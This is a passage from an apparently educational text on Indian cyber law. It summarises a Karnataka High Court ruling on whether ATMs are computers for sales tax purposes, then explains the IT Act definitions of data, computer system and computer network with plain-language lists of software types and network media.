would fall under Entry 20(ii)(b) of Part 'C' of Second 
Schedule to the Karnataka Sales Tax Act. 

The Chairman of the ARA dissented from the majority 
view. In his opinion, ATMs would fit into the description of 
electronic goods, parts and accessories thereof. They 
would thus attract 12% basic tax and would fall under 
Entry 4 of Part 'E' of the Second Schedule to the KST Act. 

The Commissioner of Commercial Taxes was of the view 
that the ARA ruling was erroneous and passed an order 
that ATMs cannot be classified as computer terminals. 

The High Court of Karnataka acknowledged that the IT 
Act provided an enlarged definition of "computers". 
However, the Court held that such a wide definition 
could not be used for interpreting a taxation related 
law such as the Karnataka Sales Tax Act, 1957. 

The High Court also said that an ATM is not a computer 
by itself and it is connected to a computer that 
performs the tasks requested by the persons using the 
ATM. The computer is connected electronically to many 
ATMs that may be located at some distance from the 
computer. 


Diebold Systems Pvt Ltd vs. Commissioner of Commercial 
Taxes ILR 2005 KAR 2210, [2006] 144 STC 59(Kar) 


Data 

(According to section 2(1)(o) of the IT Act) 

“data” means a representation of information, knowledge, facts, 
concepts or instructions which are being prepared or have been 
prepared in a formalised manner, and is intended to be 
processed, is being processed or has been processed in a 
computer system or computer network, and may be in any form 
(including computer printouts, magnetic or optical storage media, 
punched cards, punched tapes) or stored internally in the 
memory of the computer; 


Simply put, data is 

1. a representation of information, knowledge, facts, concepts or 
instructions, 

2. prepared or being prepared in a formalized manner, 

3. processed, being processed or sought to be processed in a 
computer. 



Data can be in many forms such as 

1. computer printouts, 

2. magnetic storage media e.g. hard disks, 

3. optical storage media e.g. CD ROMs, DVDs, VCDs 

4. punched cards or tapes i.e. a paper card in which holes are 
punched. 

Computer Software 

Computer software is a general term that describes a collection of: 

1. computer programs, 

2. procedures and 

3. documentation. 


System software can be of various types such as: 

1. operating systems which form the platform for all other software 
on a computer, 

2. device drivers which allow computer programs to interact with 
hardware devices such as printers, scanners etc, 

3. programming tools which help programmers to develop and test 
other programs, 

4. compilers which compile the source code into the object code, 

5. linkers which link object code files (and libraries) to generate an 
executable file, 

6. utility software that helps manage and tune the computer 
hardware, operating system or application software. 

Application software includes 

1. word processors (e.g. Microsoft Word), 

2. spreadsheets (e.g. Microsoft Excel) 

3. presentation software (e.g. Microsoft PowerPoint) 

4. media players (e.g. Microsoft Windows Media Player) 

5. games (e.g. Need for Speed, Age of Empires) 

6. forensic software (e.g. WinHex, X-Ways Forensics) 

7. encryption software (e.g. PGP) 

8. Internet browsers (e.g. Mozilla Firefox) 

9. FTP clients (e.g. FireFTP) 

and hundreds of other types of software. 

Computer System 

(According to section 2(1)(l) of the IT Act) 

"computer system" means a device or collection of devices, 
including input and output support devices and excluding 
calculators which are not programmable and capable of being 
used in conjunction with external files, which contain computer 
programs, electronic instructions, input data and output data, 
that performs logic, arithmetic, data storage and retrieval, 
communication control and other functions. 


Simply put, a computer system has the following characteristics: 

1. it is a device or collection of devices which contain data or programs, 

2. it performs functions such as logic, storage, arithmetic etc, 

3. it includes input and output support systems, 

4. it excludes non-programmable calculators. 

Computer Network 


(According to section 2(1)(j) of the IT Act) 

"computer network" means the interconnection of one or more 
computers through: 

(i) the use of satellite, microwave, terrestrial line or other 
communication media and 

(ii) terminals or a complex consisting of two or more 
interconnected computers whether or not the interconnection is 
continuously maintained. 



Simply put, a computer network is the interconnection of computers 
through one or more of the following: 

• satellite 

Satellite Internet connection is an 
arrangement in which the outgoing and 
incoming data travels through a satellite. 
Each subscriber’s hardware includes a 
satellite dish antenna and a transceiver 
(transmitter / receiver). The dish antenna 
transmits and receives signals. 

• microwave 

The term microwave refers to 
electromagnetic waves of a particular 
frequency. Microwave frequencies are used 
in radars, Bluetooth devices, radio 
astronomy, GSM mobile phone networks, 
broadcasting and telecommunication 
transmissions etc. 

• terrestrial line 

Terrestrial lines include fibre optic cables, 
telephone lines etc. 

• other communication media 

Communication media refers to any 
instrument or means that facilitates the 
transfer of data, as between a computer 
and peripherals or between two computers. 
Other ways in which two computers can be 
connected include cables, hubs, switches 
etc. 





